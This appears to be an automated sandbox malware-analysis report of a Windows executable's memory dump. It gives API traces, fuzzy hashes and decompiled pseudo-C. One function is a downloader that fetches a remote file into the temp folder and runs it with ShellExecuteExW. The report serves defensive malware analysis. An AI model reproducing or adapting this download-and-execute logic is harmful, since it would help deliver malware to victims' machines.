0x00423396
0x004233ca
0x004233d4
0x004233d4
0x004233de
0x00000000
0x004233de
0x0042339f
0x004233b8
0x004233bf
0x004231e2
0x00000000
0x004231e2
0x00423357
0x004232d4
0x00000000
0x004232a0
0x004232a7
0x004232aa
0x004232ac
0x004232d6
0x004232d8
0x00000000
0x004232de
0x00000000
0x004232ac
0x0042329e
0x004231f9
0x004231fc
0x00423217
0x0042321c
0x00423222
0x00423224
0x0042322f
0x0042322f
0x00000000
0x00423224
0x0042317d
0x00423184
0x00423186
0x004231bd
0x004231bd
0x004231c7
0x004231ca
0x004231d1
0x004231d1
0x004231d1
0x004231dd
0x00000000
0x004231dd
0x00423188
0x0042318c
0x00000000
0x00000000
0x0042318e
0x0042319d
0x004231a2
0x004231a5
0x004231a6
0x004231a9
0x004231a9
0x004231b0
0x004231b2
0x004231b5
0x004231b8
0x004231bb
0x00000000
0x00000000
0x00000000
0x0042311b
0x00423120
0x00423123
0x0042312a
0x00000000
0x0042312a
0x004230f4
0x004230f9
0x004230ff
0x00423101
0x00000000
0x00423106

APIs

Part of subcall function 00422E01: CreateFileW.KERNEL32(00000000,?,?,k1B,?,?,00000000,?,0042316B,00000000,0000000C), ref: 00422E1E

GetLastError.KERNEL32 ref: 004231D6
__dosmaperr.LIBCMT ref: 004231DD
GetFileType.KERNEL32(00000000), ref: 004231E9
GetLastError.KERNEL32 ref: 004231F3
__dosmaperr.LIBCMT ref: 004231FC
CloseHandle.KERNEL32(00000000), ref: 0042321C
CloseHandle.KERNEL32(?), ref: 00423366
GetLastError.KERNEL32 ref: 00423398
__dosmaperr.LIBCMT ref: 0042339F

Strings

H, xrefs: 00423324

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: a4942371b506dd9462ba3544575655abe0f9b1ab7f6b0fa72c3061be74e8edae
Instruction ID: fffc75d5f90954a0400e18c596e59fc140d20fa7a541ac332aa2509d335a65ac
Opcode Fuzzy Hash: a4942371b506dd9462ba3544575655abe0f9b1ab7f6b0fa72c3061be74e8edae
Instruction Fuzzy Hash: 5DA14832B141548FDF18EF68E8927AE7BB0AB06325F14015EE811DB391DB3D9E12C759

Uniqueness

Uniqueness Score: -1.00%

Function 00402EE6, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 234
networkCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00402EE6(void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* __ebx;
				void* _t106;
				intOrPtr* _t109;
				intOrPtr* _t110;
				intOrPtr* _t113;
				intOrPtr* _t116;
				CONTEXT* _t117;
				void* _t119;
				void* _t121;
				void* _t122;
				void* _t151;
				CONTEXT* _t199;
				void* _t200;
				void* _t204;
				void* _t206;
				intOrPtr _t207;
				void* _t208;
				intOrPtr _t210;
				void* _t215;

				_t227 = __fp0;
				_t215 = __eflags;
				E00424FAC(E0042606E, __ecx, __edi, __esi, _t204, __fp0);
				E0040B770();
				__imp__CoInitialize(0, __edi, __esi, _t151); // executed
				 *((intOrPtr*)(_t204 - 0x54)) = 0x10e8;
				 *(_t204 - 4) = 0;
				 *((intOrPtr*)(_t204 - 0x14)) = 0;
				 *(_t204 - 4) = 2;
				_push(0x7c);
				_t207 = _t206 - 0x18;
				 *((intOrPtr*)(_t204 - 0x10)) = _t207;
				E00403656(_t207, 0x4389b0);
				 *(_t204 - 4) = 3;
				 *(_t204 - 4) = 2;
				_t106 = E004029BD(_t204 - 0x2c, __edi, 0x10e8, __fp0);
				_t208 = _t207 + 0x18;
				 *(_t204 - 4) = 4;
				E004028F6(_t204 - 0x50, _t106, __edi, 0x10e8, _t215, __fp0);
				 *(_t204 - 4) = 6;
				E0040593A(_t204 - 0x2c, 1, 0);
				 *((intOrPtr*)(_t204 - 0x34)) = 0;
				 *((intOrPtr*)(_t204 - 0x30)) = 0;
				 *((intOrPtr*)(_t204 - 0x30)) = 0xf;
				 *((intOrPtr*)(_t204 - 0x34)) = 0;
				 *((char*)(_t204 - 0x44)) = 0;
				 *(_t204 - 4) = 7;
				_t109 =  *((intOrPtr*)(_t204 - 0x50));
				if( *((intOrPtr*)(_t109 + 0x14)) >= 0x10) {
					_t109 =  *_t109;
				}
				__imp__DeleteUrlCacheEntryA(_t109); // executed
				_t110 =  *((intOrPtr*)(_t204 - 0x50));
				if( *((intOrPtr*)(_t110 + 0x14)) >= 0x10) {
					_t110 =  *_t110;
				}
				__imp__URLOpenBlockingStreamA(0, _t110, _t204 - 0x14, 0, 0); // executed
				if(_t110 < 0) {
					L12:
					 *(_t204 - 4) = 6;
					E0040593A(_t204 - 0x44, 1, 0);
					 *(_t204 - 4) = 2;
					E00403300(_t204 - 0x50);
					 *(_t204 - 4) = 0;
					_t113 =  *((intOrPtr*)(_t204 - 0x14));
					if(_t113 != 0) {
						 *((intOrPtr*)( *_t113 + 8))(_t113);
					}
					 *(_t204 - 4) =  *(_t204 - 4) | 0xffffffff;
					if(0x10e8 >= 0) {
						__imp__CoUninitialize(); // executed
					}
					 *[fs:0x0] =  *((intOrPtr*)(_t204 - 0xc));
					return 0;
				} else {
					while(1) {
						_t116 =  *((intOrPtr*)(_t204 - 0x14));
						 *((intOrPtr*)(_t204 - 0x10)) = 0;
						_t190 = _t204 - 0x10f4;
						_t165 =  *_t116;
						_t117 =  *((intOrPtr*)( *_t116 + 0xc))(_t116, _t204 - 0x10f4, 0x1000, _t204 - 0x10);
						_t219 =  *((intOrPtr*)(_t204 - 0x10));
						_t199 = _t117;
						if( *((intOrPtr*)(_t204 - 0x10)) > 0) {
							_push(0);
							_push( *((intOrPtr*)(_t204 - 0x10)));
							_push(_t204 - 0x10f4);
							E00404584(0x4390f8, _t190, _t199, 0x10e8, _t219, _t227);
							_push( *((intOrPtr*)(_t204 - 0x10)));
							_t165 = _t204 - 0x44;
							E00403555(0, _t204 - 0x44, _t199, 0x10e8, _t219, _t227, _t204 - 0x10f4); // executed
						}
						if(_t199 < 0) {
							goto L12;
						}
						if(_t199 != 1) {
							continue;
						}
						if(E004034B9( *((intOrPtr*)(_t204 - 0x50)) + 0x18, _t165) != 0) {
							_t119 = E00402702(_t204 - 0xf4, _t190, _t199, 0x10e8, __eflags, _t227);
							 *(_t204 - 4) = 0xd;
							_t200 = E004025BD(_t204 - 0xdc, _t119, _t199, 0x10e8, _t227);
							 *(_t204 - 4) = 0xe;
							_t121 = E004026AC(_t204 - 0xc4, _t200, 0x10e8, __eflags);
							 *(_t204 - 4) = 0xf;
							_push(_t200);
							_t122 = E00408052(_t204 - 0xac, _t121, _t200, 0x10e8, _t227);
							 *(_t204 - 4) = 0x10;
							E004080E3(_t204 - 0x2c, _t122, _t200, 0x10e8, __eflags, _t227);
							 *(_t204 - 4) = 0x12;
							E0040572F(_t204 - 0xac, 1, 0);
							 *(_t204 - 4) = 0x13;
							E0040572F(_t204 - 0xc4, 1, 0);
							 *(_t204 - 4) = 0x14;
							E0040572F(_t204 - 0xdc, 1, 0);
							 *(_t204 - 4) = 0x15;
							E0040593A(_t204 - 0xf4, 1, 0);
							_t210 = _t208 - 0x18;
							 *((intOrPtr*)(_t204 - 0x10)) = _t210;
							E00403656(_t210, _t204 - 0x44);
							 *(_t204 - 4) = 0x16;
							_t211 = _t210 - 0x18;
							 *((intOrPtr*)(_t204 - 0x58)) = _t210 - 0x18;
							E00403491(_t210 - 0x18, _t204 - 0x2c);
							 *(_t204 - 4) = 0x17;
							 *(_t204 - 4) = 0x15;
							E004027A9(_t211, _t122, _t200, 0x10e8, __eflags, _t227); // executed
							 *(_t204 - 0x94) = 0x3c;
							E0040BDD0(_t200, _t204 - 0x90, 0, 0x38);
							 *(_t204 - 0x88) = L"open";
							__eflags =  *((intOrPtr*)(_t204 - 0x18)) - 8;
							 *((intOrPtr*)(_t204 - 0x8c)) = 0;
							_t136 =  >=  ?  *((void*)(_t204 - 0x2c)) : _t204 - 0x2c;
							 *((intOrPtr*)(_t204 - 0x84)) =  >=  ?  *((void*)(_t204 - 0x2c)) : _t204 - 0x2c;
							 *((intOrPtr*)(_t204 - 0x78)) = 1;
							ShellExecuteExW(_t204 - 0x94); // executed
							 *(_t204 - 4) = 7;
							E0040572F(_t204 - 0x2c, 1, 0);
						} else {
							_t182 =  >=  ?  *((void*)(_t204 - 0x44)) : _t204 - 0x44;
							_t195 =  >=  ?  *((void*)(_t204 - 0x44)) : _t204 - 0x44;
							 *((char*)(_t204 - 0x10)) = 0;
							_t142 =  *((intOrPtr*)(_t204 - 0x34)) + 1 + ( >=  ?  *((void*)(_t204 - 0x44)) : _t204 - 0x44);
							_push( *((intOrPtr*)(_t204 - 0x10)));
							 *((intOrPtr*)(_t204 - 0x20)) = 0;
							_push( *((intOrPtr*)(_t204 - 0x34)) + 1 + ( >=  ?  *((void*)(_t204 - 0x44)) : _t204 - 0x44));
							_push( >=  ?  *((void*)(_t204 - 0x44)) : _t204 - 0x44);
							 *((intOrPtr*)(_t204 - 0x1c)) = 0;
							 *((intOrPtr*)(_t204 - 0x18)) = 0;
							E00408C65(_t204 - 0x20, _t227);
							 *(_t204 - 4) = 0xa;
							 *((intOrPtr*)(_t204 - 0x10)) = _t208 - 0x1c;
							E00403428(_t208 - 0x1c, _t227, 0x433260);
							 *(_t204 - 4) = 0xb;
							 *(_t204 - 4) = 0xa;
							E00402C80( *((intOrPtr*)(_t204 - 0x20)), 0, _t199, 0x10e8, _t227);
							 *(_t204 - 4) = 7;
							E00404C58(_t204 - 0x20);
						}
						goto L12;
					}
					goto L12;
				}
			}

0x00402ee6
0x00402ee6
0x00402eeb
0x00402ef5
0x00402f00
0x00402f08
0x00402f0b
0x00402f0e
0x00402f11
0x00402f15
0x00402f17
0x00402f1c
0x00402f24
0x00402f29
0x00402f2d
0x00402f34
0x00402f39
0x00402f3c
0x00402f45
0x00402f4b
0x00402f55
0x00402f5a
0x00402f5d
0x00402f60
0x00402f67
0x00402f6a
0x00402f6d
0x00402f71
0x00402f78
0x00402f7a
0x00402f7a
0x00402f7d
0x00402f83
0x00402f8a
0x00402f8c
0x00402f8c
0x00402f96
0x00402f9e
0x004031a2
0x004031a2
0x004031ac
0x004031b1
0x004031b8
0x004031bd
0x004031c0
0x004031c5
0x004031ca
0x004031ca
0x004031cd
0x004031d3
0x004031d5
0x004031d5
0x004031e2
0x004031ed
0x00402fa4
0x00402fa4
0x00402fa4
0x00402fb0
0x00402fb3
0x00402fb9
0x00402fbd
0x00402fc0
0x00402fc4
0x00402fc6
0x00402fc8
0x00402fc9
0x00402fd7
0x00402fd8
0x00402fdd
0x00402fe7
0x00402fea
0x00402fea
0x00402ff1
0x00000000
0x00000000
0x00402ffa
0x00000000
0x00000000
0x0040300a
0x0040307f
0x00403084
0x00403095
0x00403097
0x004030a1
0x004030a6
0x004030ac
0x004030b3
0x004030b8
0x004030c1
0x004030c7
0x004030d4
0x004030d9
0x004030e6
0x004030eb
0x004030f8
0x004030fd
0x0040310a
0x0040310f
0x00403117
0x0040311b
0x00403120
0x00403124
0x0040312a
0x00403130
0x00403135
0x00403139
0x0040313d
0x0040314a
0x00403156
0x0040315e
0x00403168
0x0040316f
0x00403175
0x00403179
0x0040317f
0x0040318d
0x00403193
0x0040319d
0x0040300c
0x00403019
0x0040301d
0x00403022
0x00403025
0x00403027
0x0040302a
0x0040302d
0x0040302e
0x00403032
0x00403035
0x00403038
0x0040303d
0x00403046
0x0040304e
0x00403053
0x00403057
0x00403060
0x00403068
0x0040306f
0x0040306f
0x00000000
0x0040300a
0x00000000
0x00402fa4

APIs

__EH_prolog.LIBCMT ref: 00402EEB
CoInitialize.OLE32(00000000), ref: 00402F00

Part of subcall function 004029BD: __EH_prolog.LIBCMT ref: 004029C2

Part of subcall function 004028F6: __EH_prolog.LIBCMT ref: 004028FB

Part of subcall function 0040593A: std::_Deallocate.LIBCONCRT ref: 0040596A

DeleteUrlCacheEntryA.WININET(?,00000001), ref: 00402F7D
URLOpenBlockingStreamA.URLMON(00000000,?,00000010,00000000,00000000), ref: 00402F96

Part of subcall function 00402702: __EH_prolog.LIBCMT ref: 00402707

Part of subcall function 004025BD: __EH_prolog.LIBCMT ref: 004025C2

Part of subcall function 004026AC: __EH_prolog.LIBCMT ref: 004026B1
Part of subcall function 004026AC: GetTempPathW.KERNEL32(00000104,?), ref: 004026D2

Part of subcall function 00408052: __EH_prolog.LIBCMT ref: 00408057

Part of subcall function 004080E3: __EH_prolog.LIBCMT ref: 004080E8
Part of subcall function 004080E3: char_traits.LIBCPMT ref: 00408101

Part of subcall function 0040572F: std::_Deallocate.LIBCONCRT ref: 0040575F

Part of subcall function 004027A9: __EH_prolog.LIBCMT ref: 004027AE

ShellExecuteExW.SHELL32(?), ref: 0040318D
CoUninitialize.OLE32(00000001,00000000), ref: 004031D5

Strings

p]Dk, xrefs: 00402F96
<, xrefs: 0040314A
open, xrefs: 0040315E

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$Deallocatestd::_$BlockingCacheDeleteEntryExecuteInitializeOpenPathShellStreamTempUninitializechar_traits
String ID: <$open$p]Dk
API String ID: 3543381169-3201613690
Opcode ID: 066c74a62e2708c2b66f8e66b56ee266bf3d6f5e03d0371e59ec8e98c8c87ba1
Instruction ID: 80abd3e8cc5d1828489b7f9832094804a4f6b2d884fb0ca3a5b5332cc043024f
Opcode Fuzzy Hash: 066c74a62e2708c2b66f8e66b56ee266bf3d6f5e03d0371e59ec8e98c8c87ba1
Instruction Fuzzy Hash: B1A17F70D04249EEEB01EFA4C995BDEBBB4AF14308F5040AEE445B72C2DBB85B05DB65

Uniqueness

Uniqueness Score: -1.00%

Function 004195CF, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E004195CF(signed int _a4, void* _a8, signed int _a12) {
				signed int _v8;
				long _v12;
				struct _OVERLAPPED* _v16;
				long _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				void* _v52;
				void* __ebx;
				signed int _t62;
				intOrPtr _t66;
				signed char _t68;
				signed int _t69;
				signed int _t71;
				signed int _t73;
				signed int _t74;
				signed int _t75;
				signed int _t76;
				intOrPtr _t78;
				signed int _t80;
				signed int _t84;
				signed int _t87;
				signed int _t101;
				signed int _t102;
				signed int _t105;
				intOrPtr _t107;
				signed int _t112;
				signed int _t114;
				void* _t116;
				signed int _t120;
				signed int _t123;
				signed int _t125;
				void* _t126;

				_t62 =  *0x438070; // 0xf2c84916
				_v8 = _t62 ^ _t125;
				_t105 = _a12;
				_v12 = _t105;
				_t120 = _a4;
				_t116 = _a8;
				_v52 = _t116;
				if(_t105 != 0) {
					__eflags = _t116;
					if(_t116 != 0) {
						_t101 = _t120 >> 6;
						_t114 = (_t120 & 0x0000003f) * 0x30;
						_v32 = _t101;
						_t66 =  *((intOrPtr*)(0x439a78 + _t101 * 4));
						_v48 = _t66;
						_v28 = _t114;
						_t102 =  *((intOrPtr*)(_t66 + _t114 + 0x29));
						__eflags = _t102 - 2;
						if(_t102 == 2) {
							L6:
							_t68 =  !_t105;
							__eflags = _t68 & 0x00000001;
							if((_t68 & 0x00000001) != 0) {
								_t66 = _v48;
								L9:
								__eflags =  *(_t66 + _t114 + 0x28) & 0x00000020;
								if(__eflags != 0) {
									E0041B8B1(_t120, 0, 0, 2);
									_t126 = _t126 + 0x10;
								}
								_t69 = E00419174(_t102, _t114, __eflags, _t120);
								__eflags = _t69;
								if(_t69 == 0) {
									_t25 =  &_v32; // 0x413ae8
									_t107 =  *((intOrPtr*)(0x439a78 +  *_t25 * 4));
									_t71 = _v28;
									__eflags =  *(_t107 + _t71 + 0x28) & 0x00000080;
									if(( *(_t107 + _t71 + 0x28) & 0x00000080) == 0) {
										_v24 = 0;
										_v20 = 0;
										_v16 = 0;
										_t73 = WriteFile( *(_t107 + _t71 + 0x18), _t116, _v12,  &_v20, 0); // executed
										__eflags = _t73;
										if(_t73 == 0) {
											_v24 = GetLastError();
										}
										goto L28;
									}
									_t84 = _t102;
									__eflags = _t84;
									if(_t84 == 0) {
										E004191EA( &_v24, _t120, _t116, _v12);
										goto L17;
									}
									_t87 = _t84 - 1;
									__eflags = _t87;
									if(_t87 == 0) {
										_t86 = E004193B7( &_v24, _t120, _t116, _v12);
										goto L17;
									}
									__eflags = _t87 != 1;
									if(_t87 != 1) {
										goto L34;
									}
									_t86 = E004192C9( &_v24, _t120, _t116, _v12);
									goto L17;
								} else {
									__eflags = _t102;
									if(_t102 == 0) {
										_t86 = E00418F54( &_v24, _t120, _t116, _v12);
										L17:
										L15:
										L28:
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t74 = _v40;
										__eflags = _t74;
										if(_t74 != 0) {
											_t75 = _t74 - _v36;
											__eflags = _t75;
											L40:
											L41:
											E0040AEA8();
											return _t75;
										}
										_t76 = _v44;
										__eflags = _t76;
										if(_t76 == 0) {
											_t116 = _v52;
											L34:
											_t112 = _v28;
											_t78 =  *((intOrPtr*)(0x439a78 + _v32 * 4));
											__eflags =  *(_t78 + _t112 + 0x28) & 0x00000040;
											if(( *(_t78 + _t112 + 0x28) & 0x00000040) == 0) {
												L37:
												 *((intOrPtr*)(E00413C2D())) = 0x1c;
												_t80 = E00413C1A();
												 *_t80 =  *_t80 & 0x00000000;
												__eflags =  *_t80;
												L38:
												_t75 = _t80 | 0xffffffff;
												goto L40;
											}
											__eflags =  *_t116 - 0x1a;
											if( *_t116 != 0x1a) {
												goto L37;
											}
											_t75 = 0;
											goto L40;
										}
										_t123 = 5;
										__eflags = _t76 - _t123;
										if(_t76 != _t123) {
											_t80 = E00413BF7(_t76);
										} else {
											 *((intOrPtr*)(E00413C2D())) = 9;
											_t80 = E00413C1A();
											 *_t80 = _t123;
										}
										goto L38;
									}
									__eflags = _t102 - 1 - 1;
									if(_t102 - 1 > 1) {
										goto L34;
									}
									E00419107( &_v24, _t116, _v12);
									goto L15;
								}
							}
							 *(E00413C1A()) =  *_t94 & 0x00000000;
							 *((intOrPtr*)(E00413C2D())) = 0x16;
							_t80 = E00413708();
							goto L38;
						}
						__eflags = _t102 - 1;
						if(_t102 != 1) {
							goto L9;
						}
						goto L6;
					}
					 *(E00413C1A()) =  *_t96 & _t116;
					 *((intOrPtr*)(E00413C2D())) = 0x16;
					_t75 = E00413708() | 0xffffffff;
					goto L41;
				}
				_t75 = 0;
				goto L41;
			}

0x004195d7
0x004195de
0x004195e1
0x004195e4
0x004195e8
0x004195ec
0x004195ef
0x004195f4
0x004195fd
0x004195ff
0x00419625
0x0041962b
0x0041962e
0x00419631
0x00419638
0x0041963b
0x0041963e
0x00419642
0x00419645
0x0041964c
0x0041964e
0x00419650
0x00419652
0x00419671
0x00419674
0x00419674
0x00419679
0x00419682
0x00419687
0x00419687
0x0041968b
0x00419691
0x00419693
0x004196ce
0x004196d1
0x004196d8
0x004196db
0x004196e0
0x0041972f
0x00419732
0x00419735
0x00419741
0x00419747
0x00419749
0x00419751
0x00419751
0x00000000
0x00419754
0x004196e5
0x004196e5
0x004196e8
0x00419721
0x00000000
0x00419721
0x004196ea
0x004196ea
0x004196ed
0x00419711
0x00000000
0x00419711
0x004196ef
0x004196f2
0x00000000
0x00000000
0x00419701
0x00000000
0x00419695
0x00419695
0x00419697
0x004196c4
0x004196c9
0x004196b4
0x00419757
0x0041975a
0x0041975b
0x0041975c
0x0041975d
0x00419760
0x00419762
0x004197c7
0x004197c7
0x004197ca
0x004197cb
0x004197d2
0x004197da
0x004197da
0x00419764
0x00419767
0x00419769
0x0041978f
0x00419792
0x00419795
0x00419798
0x0041979f
0x004197a4
0x004197af
0x004197b4
0x004197ba
0x004197bf
0x004197bf
0x004197c2
0x004197c2
0x00000000
0x004197c2
0x004197a6
0x004197a9
0x00000000
0x00000000
0x004197ab
0x00000000
0x004197ab
0x0041976d
0x0041976e
0x00419770
0x00419787
0x00419772
0x00419777
0x0041977d
0x00419782
0x00419782
0x00000000
0x00419770
0x0041969b
0x0041969e
0x00000000
0x00000000
0x004196ac
0x00000000
0x004196b1
0x00419693
0x00419659
0x00419661
0x00419667
0x00000000
0x00419667
0x00419647
0x0041964a
0x00000000
0x00000000
0x00000000
0x0041964a
0x00419606
0x0041960d
0x00419618
0x00000000
0x00419618
0x004195f6
0x00000000

Strings

:A, xrefs: 004196CE

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID: :A
API String ID: 0-3225631715
Opcode ID: d6a1a2a874297e62e7e895f8bc55f91a784784fc29b9bdbcb6901d34811a84ac
Instruction ID: f84aeed4368c25537b65dfc769c40d5ab814cb456ae343e3c282ce7d6a7354f7
Opcode Fuzzy Hash: d6a1a2a874297e62e7e895f8bc55f91a784784fc29b9bdbcb6901d34811a84ac
Instruction Fuzzy Hash: A051E171E1020AEADB10EFA9C855FEF7BB4AF05314F14011BF420A7291D7389E81CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00403B7C, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 151
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00403B7C(intOrPtr __ecx, void* __edi, signed int __esi, void* __fp0) {
				void* __ebx;
				signed int _t69;
				signed int _t71;
				signed int _t73;
				void* _t80;
				signed int _t81;
				signed int _t86;
				signed int _t89;
				signed int _t98;
				intOrPtr _t101;
				signed int** _t105;
				signed int _t109;
				intOrPtr* _t110;
				signed int* _t111;
				intOrPtr _t113;
				signed int _t117;
				intOrPtr _t118;
				void* _t121;
				void* _t123;
				void* _t124;

				_t127 = __fp0;
				E00424FAC(E004260EA, __ecx, __edi, __esi, _t121, __fp0);
				_t124 = _t123 - 0x2c;
				_t86 =  *(_t121 + 8);
				_push(__esi);
				_push(__edi);
				_t117 = __esi | 0xffffffff;
				_t113 = __ecx;
				 *((intOrPtr*)(_t121 - 0x14)) = __ecx;
				if(_t86 != _t117) {
					_t89 =  *( *(__ecx + 0x20));
					__eflags = _t89;
					if(_t89 == 0) {
						L5:
						__eflags =  *(_t113 + 0x4c);
						if( *(_t113 + 0x4c) != 0) {
							E00405E30(_t113);
							__eflags =  *(_t113 + 0x38);
							if(__eflags != 0) {
								_push(0);
								 *((intOrPtr*)(_t121 - 0x28)) = 0;
								 *((intOrPtr*)(_t121 - 0x24)) = 0;
								 *(_t121 - 0x10) = _t86;
								 *((intOrPtr*)(_t121 - 0x24)) = 0xf;
								 *((intOrPtr*)(_t121 - 0x28)) = 0;
								 *((char*)(_t121 - 0x38)) = 0;
								E00405AA3(_t121 - 0x38, _t127, 8);
								_t17 = _t121 - 4;
								 *_t17 =  *(_t121 - 4) & 0x00000000;
								__eflags =  *_t17;
								 *(_t121 + 8) = _t113 + 0x40;
								while(1) {
									L10:
									_t118 =  *((intOrPtr*)(_t121 - 0x24));
									while(1) {
										__eflags = _t118 - 0x10;
										_t93 =  >=  ?  *((void*)(_t121 - 0x38)) : _t121 - 0x38;
										_t107 =  >=  ?  *((void*)(_t121 - 0x38)) : _t121 - 0x38;
										_t65 =  *((intOrPtr*)(_t121 - 0x28)) + ( >=  ?  *((void*)(_t121 - 0x38)) : _t121 - 0x38);
										_t69 =  *((intOrPtr*)( *( *(_t113 + 0x38)) + 0x1c))( *(_t121 + 8), _t121 - 0x10, _t121 - 0xf, _t121 - 0x20,  >=  ?  *((void*)(_t121 - 0x38)) : _t121 - 0x38,  *((intOrPtr*)(_t121 - 0x28)) + ( >=  ?  *((void*)(_t121 - 0x38)) : _t121 - 0x38), _t121 - 0x18);
										__eflags = _t69;
										if(_t69 < 0) {
											break;
										}
										__eflags = _t69 - 1;
										if(_t69 > 1) {
											__eflags = _t69 - 3;
											if(__eflags != 0) {
												break;
											} else {
												_t73 = E00402552(__eflags,  *(_t121 - 0x10),  *((intOrPtr*)( *((intOrPtr*)(_t121 - 0x14)) + 0x4c)));
												_pop(_t98);
												__eflags = _t73;
												_t100 =  !=  ? _t86 : _t98 | 0xffffffff;
												_t86 =  !=  ? _t86 : _t98 | 0xffffffff;
											}
										} else {
											_t118 =  *((intOrPtr*)(_t121 - 0x24));
											_t101 =  *((intOrPtr*)(_t121 - 0x38));
											__eflags = _t118 - 0x10;
											_t113 =  *((intOrPtr*)(_t121 - 0x14));
											_t75 =  >=  ? _t101 : _t121 - 0x38;
											_t109 =  *((intOrPtr*)(_t121 - 0x18)) - ( >=  ? _t101 : _t121 - 0x38);
											__eflags = _t109;
											 *(_t121 - 0x1c) = _t109;
											if(_t109 == 0) {
												L16:
												 *((char*)(_t113 + 0x3d)) = 1;
												__eflags =  *((intOrPtr*)(_t121 - 0x20)) - _t121 - 0x10;
												if( *((intOrPtr*)(_t121 - 0x20)) == _t121 - 0x10) {
													__eflags = _t109;
													if(_t109 != 0) {
														continue;
													} else {
														__eflags =  *((intOrPtr*)(_t121 - 0x28)) - 0x20;
														if( *((intOrPtr*)(_t121 - 0x28)) >= 0x20) {
															break;
														} else {
															_push(_t109);
															E00405C00(_t86, _t121 - 0x38, _t127, 8);
															goto L10;
														}
													}
												}
											} else {
												__eflags = _t118 - 0x10;
												_t79 =  >=  ? _t101 : _t121 - 0x38;
												_t80 = E00413B5C(_t101,  >=  ? _t101 : _t121 - 0x38, 1, _t109,  *(_t113 + 0x4c));
												_t109 =  *(_t121 - 0x1c);
												_t124 = _t124 + 0x10;
												__eflags = _t109 - _t80;
												if(_t109 != _t80) {
													break;
												} else {
													_t118 =  *((intOrPtr*)(_t121 - 0x24));
													goto L16;
												}
											}
										}
										L23:
										_t52 = _t121 - 4;
										 *_t52 =  *(_t121 - 4) | 0xffffffff;
										__eflags =  *_t52;
										E0040593A(_t121 - 0x38, 1, 0);
										goto L24;
									}
									_t86 = _t86 | 0xffffffff;
									__eflags = _t86;
									goto L23;
								}
							} else {
								_t81 = E00402552(__eflags, _t86,  *(_t113 + 0x4c)); // executed
								__eflags = _t81;
								_t117 =  !=  ? _t86 : _t117;
								goto L6;
							}
						} else {
							L6:
							_t71 = _t117;
						}
					} else {
						_t110 =  *((intOrPtr*)(__ecx + 0x30));
						__eflags = _t89 -  *_t110 + _t89;
						if(_t89 >=  *_t110 + _t89) {
							goto L5;
						} else {
							 *_t110 =  *_t110 - 1;
							_t105 =  *(__ecx + 0x20);
							_t111 =  *_t105;
							 *_t105 =  &(_t111[0]);
							 *_t111 = _t86;
							L24:
							_t71 = _t86;
						}
					}
				} else {
					_t71 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t121 - 0xc));
				return _t71;
			}

0x00403b7c
0x00403b81
0x00403b86
0x00403b8a
0x00403b8d
0x00403b8e
0x00403b8f
0x00403b92
0x00403b94
0x00403b99
0x00403ba5
0x00403ba7
0x00403ba9
0x00403bc9
0x00403bc9
0x00403bcd
0x00403bd8
0x00403bdf
0x00403be2
0x00403bf6
0x00403bf7
0x00403bfd
0x00403c02
0x00403c05
0x00403c0c
0x00403c0f
0x00403c12
0x00403c17
0x00403c17
0x00403c17
0x00403c1e
0x00403c21
0x00403c21
0x00403c21
0x00403c24
0x00403c24
0x00403c30
0x00403c37
0x00403c41
0x00403c56
0x00403c59
0x00403c5b
0x00000000
0x00000000
0x00403c61
0x00403c64
0x00403cce
0x00403cd1
0x00000000
0x00403cd3
0x00403cdc
0x00403ce2
0x00403ce6
0x00403ce8
0x00403ceb
0x00403ceb
0x00403c66
0x00403c66
0x00403c6c
0x00403c6f
0x00403c75
0x00403c78
0x00403c7b
0x00403c7b
0x00403c7d
0x00403c80
0x00403ca4
0x00403ca7
0x00403cab
0x00403cae
0x00403cb0
0x00403cb2
0x00000000
0x00403cb8
0x00403cb8
0x00403cbc
0x00000000
0x00403cbe
0x00403cbe
0x00403cc4
0x00000000
0x00403cc4
0x00403cbc
0x00403cb2
0x00403c82
0x00403c85
0x00403c8c
0x00403c92
0x00403c97
0x00403c9a
0x00403c9d
0x00403c9f
0x00000000
0x00403ca1
0x00403ca1
0x00000000
0x00403ca1
0x00403c9f
0x00403c80
0x00403cf2
0x00403cf2
0x00403cf2
0x00403cf2
0x00403cfd
0x00000000
0x00403cfd
0x00403cef
0x00403cef
0x00000000
0x00403cef
0x00403be4
0x00403be8
0x00403bed
0x00403bf1
0x00000000
0x00403bf1
0x00403bcf
0x00403bcf
0x00403bcf
0x00403bcf
0x00403bab
0x00403bab
0x00403bb2
0x00403bb4
0x00000000
0x00403bb6
0x00403bb6
0x00403bb8
0x00403bbb
0x00403bc0
0x00403bc2
0x00403d02
0x00403d02
0x00403d02
0x00403bb4
0x00403b9b
0x00403b9b
0x00403b9b
0x00403d0a
0x00403d14

APIs

__EH_prolog.LIBCMT ref: 00403B81

Strings

, xrefs: 00403CB8

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-3916222277
Opcode ID: 73f09eb30fa187d3ffbd4f2e2f6babcda4b21417a54c7d8e4d70898afc21a8f4
Instruction ID: f3a92159ca013b8e16d29881cf93df2024283b000ddacfc6d65e58a2fb64e0ca
Opcode Fuzzy Hash: 73f09eb30fa187d3ffbd4f2e2f6babcda4b21417a54c7d8e4d70898afc21a8f4
Instruction Fuzzy Hash: 99518031A0011AAFDF14DFA5C881AEEBBB9FF48315F10413AE515F3281E735AA45CB94

Uniqueness

Uniqueness Score: -1.00%

